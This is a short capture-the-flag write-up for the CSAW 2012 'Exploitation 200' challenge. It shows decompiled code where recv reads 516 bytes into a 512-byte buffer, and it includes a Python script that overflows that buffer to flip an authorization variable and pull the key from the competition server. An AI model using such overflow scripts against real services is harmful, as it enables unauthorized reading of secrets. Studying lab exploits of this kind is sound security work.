CSAW 2012 – Exploitation 200

leave a comment »

$ md5sum exp200
979fd4900ef48a1b958d6d555c4c35b5  exp200

$ file exp200
exp200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x94e984380a61d713c1a614f40eeee92c533593d4, not stripped

Opening the binary in IDA reveals a vulnerable function:

int __cdecl handle(int fd)
{
  char buf[512]; // [sp+1Ch] [bp-20Ch]@1
  int v3; // [sp+21Ch] [bp-Ch]@1

  v3 = 0;
  memset(buf, 0, sizeof(buf));
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, buf, 516u, 0);
  buf[511] = 0;
  if ( !strcmp(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v3 = 1;
  if ( v3 )
  {
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", buf);
    recv(fd, 0, 0x10u, 64);                     // flags=DONT_WAIT
    send(fd, buf, 0x200u, 0);
  }
  return close(fd);
}

One can choose to send “AAAAAAAAAAAAAAAAAAAAAAAAAA\n” to the server and get the key.

Or do it the hard way and overflow buf and consequently variable v1. 🙂

import socket

service_port = 54321
ip = "128.238.66.218"

s = socket.create_connection((ip, service_port))
buf = 'B' * 512 + '\x01\x00\x00\x00'
print s.recv(4096)
s.send(buf)
print s.recv(4096)

Written by teampong

October 24, 2012 at 5:29 am

Posted in Uncategorized